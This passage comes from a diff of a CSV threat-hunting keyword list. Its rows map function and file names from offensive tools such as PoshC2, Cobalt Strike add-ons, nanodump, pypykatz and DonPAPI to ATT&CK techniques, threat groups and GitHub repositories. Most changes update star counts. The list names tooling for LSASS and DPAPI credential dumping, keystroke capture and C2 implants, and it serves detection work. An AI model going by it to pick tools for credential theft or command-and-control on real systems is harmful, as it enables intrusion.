T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" -"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*get_hijackeable_dllname*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*get_injection_techniques*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*get_list_of_implant_text*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_masterkeys_from_lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*get_obfucation_string_dict*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*get_password_policy.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*get_post_ex_pipename_list*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_post_ex_spawnto_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*get_process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 